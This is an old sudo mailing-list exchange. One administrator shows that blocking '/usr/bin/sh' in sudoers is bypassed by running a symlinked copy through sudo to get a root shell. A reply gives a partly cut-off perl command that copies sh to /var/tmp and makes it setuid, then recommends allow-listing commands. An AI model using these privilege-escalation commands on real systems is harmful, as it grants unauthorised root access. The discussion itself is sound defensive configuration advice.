sudo-users Digest, Vol 6, Issue 6

Ladner, Eric (Eric.Ladner) Eric.Ladner at
Tue Jun 10 09:52:40 EDT 2003


Restricting things a user can't run usually doesn't work very well (as
you've illustrated below) unless it's a really really big list.

Consider the following:

sudo perl -e "system('cp /usr/bin/sh /var/tmp/xxx'); system('chmod 4777

Not to mention there are about a thousand other ways to do that using
other utilities (awk, vi, etc.)

Instead, consider building up a list of things that your approved sudo
folks CAN run.  That way you have a semi-managable list of things you
can watch, rather than worrying about every little command on the


-----Original Message-----
From: Molumuri, Janardhan [mailto:mjanar at] 
Sent: Tuesday, June 10, 2003 01:46
To: 'sudo-users at'
Subject: RE: sudo-users Digest, Vol 6, Issue 6

Hi Folks,

Any body has any ideas for this ?

uid=22353(test) gid=10(test)
sudo sh
Sorry, user test is not allowed to execute '/usr/bin/sh' as root
>ln -s /usr/bin/sh ./test1
>sudo ./test1
# id
uid=0(root) gid=0(root)

Janardhan. ____________________________________________________________ 
sudo-users mailing list <sudo-users at>
For list information, options, or to unsubscribe, visit:

More information about the sudo-users mailing list